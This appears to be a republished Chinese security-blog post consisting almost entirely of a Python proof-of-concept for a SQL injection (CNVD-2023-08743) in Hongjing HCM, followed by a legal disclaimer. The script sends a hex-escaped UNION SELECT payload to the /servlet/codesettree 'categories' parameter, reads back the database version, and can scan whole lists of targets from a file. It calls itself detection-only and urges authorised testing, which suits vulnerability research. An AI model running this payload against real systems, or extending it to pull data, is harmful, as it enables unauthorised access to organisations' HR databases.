模样:
检测:
POC
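#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Hongjing HCM `categories` SQL injection detection PoC (CNVD-2023-08743)
#
# Detection only: one UNION-based probe is sent to /servlet/codesettree and the
# response is checked for a marker string. The probe still executes a live
# SELECT on the target's database, so run it only against systems you are
# authorised to test.
import argparse
import sys

import requests
import urllib3

# TLS verification is deliberately disabled on the request below (verify=False);
# silence the InsecureRequestWarning that would otherwise print per target.
urllib3.disable_warnings()

# Marker that the injected SELECT echoes back on success.
MARKER = "hellohongjingHcm"

# Vulnerable endpoint; the injectable parameter is `categories`.
PATH = "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories="

# Probe value. The application appears to decode `~XX` as a hex-escaped byte
# (~27 = ', ~20 = space, ~2c = ',', ~40 = @, ~2d = -), so this reads as
#   1' union all select 'hellohongjingHcm',@@version--
# i.e. it returns the marker together with the database version string.
SQL = "~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d"

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
}

# Visual separator printed after every target result.
SEPARATOR = "[" + "-" * 100 + "]"


def title():
    """Print the tool banner.

    The original figlet-style "CNVD-2023-08743" art was lost when the listing
    was collapsed onto one line, so a plain banner is printed instead.
    """
    print("""
    CNVD-2023-08743 - Hongjing HCM categories SQL injection (detection PoC)
    Author:Henry4E36
    """)


def _normalize_url(url):
    """Return *url* stripped and with an http:// scheme if none was given.

    Only the four-character prefix is checked (matching the original `url[:4]`
    test), so both http:// and https:// targets pass through untouched.
    Trailing slashes are removed so PATH does not produce "//servlet".
    """
    url = url.strip()
    if url[:4] != "http":
        url = "http://" + url
    return url.rstrip("/")


class information(object):
    """Runs the probe against one URL (-u) or every URL listed in a file (-f)."""

    def __init__(self, args):
        self.args = args
        self.url = args.url    # target for target_url(); overwritten per line by file_url()
        self.file = args.file  # path of a file with one target per line

    def target_url(self):
        """Probe self.url once and print whether the injection fingerprint matched.

        The fingerprint is deliberately strict: HTTP 200, the marker, and the
        string "Microsoft SQL Server" (from @@version) must all be present.
        Consequently only an MSSQL backend is ever reported as vulnerable; any
        other backend or a WAF-modified response is reported as "not
        vulnerable" (a possible false negative, not proof of safety).
        Network/HTTP-level failures are reported separately with the error.
        """
        target = _normalize_url(self.url)
        try:
            # verify=False: targets are typically internal, self-signed deployments.
            res = requests.get(url=target + PATH + SQL, headers=HEADERS, verify=False, timeout=5)
        except requests.RequestException as e:
            # Surface the reason instead of a bare "connection error"; this is
            # what distinguishes a timeout from a bad scheme or a refused port.
            print(f"[\033[31mX\033[0m] 连接错误! {type(e).__name__}: {e}")
            print(SEPARATOR)
            return

        if res.status_code == 200 and MARKER in res.text and "Microsoft SQL Server" in res.text:
            # Dump the response so the extracted @@version is visible as evidence.
            print(res.text)
            print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在SQL注入!\033[0m")
        else:
            print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在SQL注入!")
        print(SEPARATOR)

    def file_url(self):
        """Probe every non-empty line of self.file in turn.

        Blank lines are skipped (the original would have probed "http://" for
        them and reported a connection error).
        """
        with open(self.file, "r", encoding="utf-8") as urls:
            for line in urls:
                line = line.strip()
                if not line:
                    continue
                self.url = line
                self.target_url()


if __name__ == "__main__":
    title()
    parser = argparse.ArgumentParser(description='宏景HCM categories SQL注入')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
    args = parser.parse_args()
    # Exactly one of -u / -f must be given. Checking the parsed values rather
    # than len(sys.argv) also accepts the `--url=...` form.
    if bool(args.url) == bool(args.file):
        print(
            "[-] 参数错误!\neg1:>>>python3 CNVD-2023-08743.py -u http://127.0.0.1\neg2:>>>python3 CNVD-2023-08743.py -f ip.txt")
        sys.exit(1)
    elif args.url:
        information(args).target_url()
    else:
        information(args).file_url()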
原文始发于微信公众号(Enginge):宏景 HCM CNVD-2023-08743 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。